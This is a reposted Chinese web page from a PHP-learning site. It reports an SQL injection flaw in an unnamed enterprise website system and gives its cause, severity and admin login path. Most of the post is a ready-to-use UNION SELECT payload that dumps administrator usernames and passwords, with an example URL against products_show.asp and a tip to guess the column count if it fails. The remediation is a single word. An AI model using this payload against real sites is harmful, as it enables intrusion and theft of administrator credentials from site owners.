网站地图    收藏   

主页 > 后端 > 网站安全 >

某企业站sql注入漏洞及修复 - 网站安全 - 自学p

来源:自学PHP网    时间:2015-04-17 14:47 作者: 阅读:

[导读] 偶然碰上的,不知版权。类型:SQL注入成因:过滤不严,导致可sql注入。等级:严重后台:admin/login.aspexp:and 1=2 union select 1,username,3,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 ......

 

偶然碰上的,不知版权。

 

 

类型:SQL注入

 

成因:过滤不严,导致可sql注入。

 

等级:严重

 

后台:admin/login.asp

 

exp:

and 1=2 union select 1,username,3,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin

 

爆不出自行猜下字段。

 

示例:

http://www.2cto.com /products_show.asp?p_id=30 and 1=2 union select 1,username,3,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin

 

修复:过滤,见本站其它共同问题文章

 

by Mr.DzY from www.0855.tv

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论